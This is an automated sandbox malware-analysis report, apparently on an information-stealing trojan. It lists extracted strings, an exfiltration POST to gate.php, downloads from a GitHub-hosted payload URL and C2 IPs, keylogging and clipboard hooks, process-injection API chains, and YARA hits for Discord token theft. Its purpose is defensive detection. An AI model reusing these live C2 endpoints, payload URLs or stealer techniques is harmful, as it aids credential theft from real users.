              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/V
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/d
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exe
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exe1
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exeLMEM
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276486720.00000000018D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exeSSC:
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exep
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exey
              Source: EgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: EgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
              Source: EgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
              Source: EgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
              Source: EgNIXduB6T.exe, 00000000.00000003.246622447.0000000007D74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.g#
              Source: TempHistory.0.drString found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
              Source: TempHistory.0.drString found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
              Source: EgNIXduB6T.exe, 00000000.00000003.246721182.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.246772033.000000000157F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6315198?pt
              Source: EgNIXduB6T.exe, 00000000.00000003.246721182.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.246772033.000000000157F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6315198?ptefdQ
              Source: EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506434482.000000000158C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.246704571.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.249137494.000000000158D000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251507801.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.246731972.000000000158D000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251553922.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251716077.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.241382685.0000000001579000.00000004.00000020.00020000.00000000.sdmp, TempHistory.0.drString found in binary or memory: https://support.google.com/chrome?p=update_error
              Source: TempHistory.0.drString found in binary or memory: https://support.google.com/chrome?p=update_errorFix
              Source: EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=update_errorKit/537.36
              Source: TempHistory.0.drString found in binary or memory: https://support.google.com/installer/?product=
              Source: EgNIXduB6T.exe, 00000000.00000003.251492860.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251706793.0000000001589000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251507801.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251543471.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254549528.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251613510.0000000001542000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251553922.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251716077.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251470245.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254609102.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506575134.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251843131.0000000001590000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251664624.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506476947.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/erbium_news
              Source: EgNIXduB6T.exe, 00000000.00000003.251492860.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251706793.0000000001589000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251507801.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251543471.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254549528.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251613510.0000000001542000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251553922.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251716077.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251470245.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254609102.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506575134.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251843131.0000000001590000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251664624.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506476947.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/erbium_support
              Source: EgNIXduB6T.exe, 00000000.00000003.251415719.0000000007DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/erbium_support)Updates
              Source: EgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: TempHistory.0.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
              Source: EgNIXduB6T.exe, 00000000.00000003.241360685.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, TempHistory.0.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
              Source: EgNIXduB6T.exe, 00000000.00000003.241378953.0000000001571000.00000004.00000020.00020000.00000000.sdmp, TempHistory.0.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
              Source: TempHistory.0.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
              Source: TempHistory.0.drString found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
              Source: unknownHTTP traffic detected: POST /gate.php HTTP/1.1Host: 194.190.152.194User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36Accept: */*Content-Length: 83404Content-Type: multipart/form-data; boundary=------------------------f057a9d3d4e5d9b5
              Source: unknownDNS traffic detected: queries for: github.com
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeCode function: 1_2_02100000 URLDownloadToFileA,1_2_02100000
              Source: global trafficHTTP traffic detected: GET /lakrica0/TeIegram/raw/main/winscr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /lakrica0/TeIegram/main/winscr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: raw.githubusercontent.com
              Source: global trafficHTTP traffic detected: GET /cloud/getHost.php?method=getstub&bid=1923830098%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36Host: 77.73.133.53
              Source: global trafficHTTP traffic detected: GET /api.php?method=getstub&bid=default%20%20%20%20%20%20%20%20%20&tag=Telegram%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36Host: 194.190.152.194
              Source: global trafficHTTP traffic detected: GET /cloud/index.php HTTP/1.1Host: 77.73.133.53User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 OPR/83.0.4254.27Accept: */*Cookie: PHPSESSID=ZrOP1CNQKIVeL1ZP
              Source: global trafficHTTP traffic detected: GET /gate.php HTTP/1.1Host: 194.190.152.194User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 OPR/83.0.4254.27Accept: */*
              Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49698 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49699 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_013014E8 SetWindowsHookExW 0000000D,013014D4,000000002_2_013014E8
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01302390 OpenClipboard,GetClipboardData,CloseClipboard,2_2_01302390
              Source: EgNIXduB6T.exe, 00000000.00000002.505628300.00000000014CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01301626 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,2_2_01301626
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01302390 OpenClipboard,GetClipboardData,CloseClipboard,2_2_01302390

              System Summary

              barindex
              Source: dump.pcap, type: PCAPMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 0.2.EgNIXduB6T.exe.1e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 0.2.EgNIXduB6T.exe.1e00000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 0.2.EgNIXduB6T.exe.5f00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 0.2.EgNIXduB6T.exe.5f00000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: Process Memory Space: EgNIXduB6T.exe PID: 5796, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: EgNIXduB6T.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: dump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 0.2.EgNIXduB6T.exe.1e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 0.2.EgNIXduB6T.exe.1e00000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 0.2.EgNIXduB6T.exe.5f00000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 0.2.EgNIXduB6T.exe.5f00000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: Process Memory Space: EgNIXduB6T.exe PID: 5796, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_00E217000_2_00E21700
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0616C7880_2_0616C788
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_05F004200_2_05F00420
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0616C8080_2_0616C808
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_060A8C800_2_060A8C80
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_013221FD2_2_013221FD
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130F8922_2_0130F892
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130C0FF2_2_0130C0FF
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130B8D32_2_0130B8D3
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130BB7D2_2_0130BB7D
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0131C2002_2_0131C200
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130FAC12_2_0130FAC1
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130FD1E2_2_0130FD1E
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130B5612_2_0130B561
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130C4A52_2_0130C4A5
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130C6702_2_0130C670
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130BE442_2_0130BE44
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0131C6AE2_2_0131C6AE
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: String function: 0130299D appears 41 times
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: String function: 0130A2A0 appears 38 times
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: String function: 01323174 appears 46 times
              Source: EgNIXduB6T.exeReversingLabs: Detection: 61%
              Source: EgNIXduB6T.exeVirustotal: Detection: 68%
              Source: EgNIXduB6T.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\EgNIXduB6T.exe C:\Users\user\Desktop\EgNIXduB6T.exe
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeProcess created: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe "C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe"
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeProcess created: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe "C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe" Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeFile created: C:\Users\user\AppData\Local\Temp\TempWebDatabaseJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/7@2/5
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: EgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: EgNIXduB6T.exe, 00000000.00000003.241410147.0000000001569000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.241510458.0000000001598000.00000004.00000020.00020000.00000000.sdmp, TempDatabase.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeMutant created: \Sessions\1\BaseNamedObjects\Runtime Broker-D7HDF4
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_013074B8 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_013074B8
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCommand line argument: Software\2_2_013057E4
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: EgNIXduB6T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0611C27A push ecx; ret 0_2_0611C28D
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01323174 push eax; ret 2_2_01323192
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130A2E6 push ecx; ret 2_2_0130A2F9
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_00E21700 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,VirtualProtectEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetExitCodeProcess,ReadProcessMemory,Sleep,0_2_00E21700
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\winscr[1].exeJump to dropped file
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeFile created: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeJump to dropped file
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_00E21700 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,VirtualProtectEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetExitCodeProcess,ReadProcessMemory,Sleep,0_2_00E21700
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exe TID: 5728Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exe TID: 5864Thread sleep count: 5690 > 30Jump to behavior
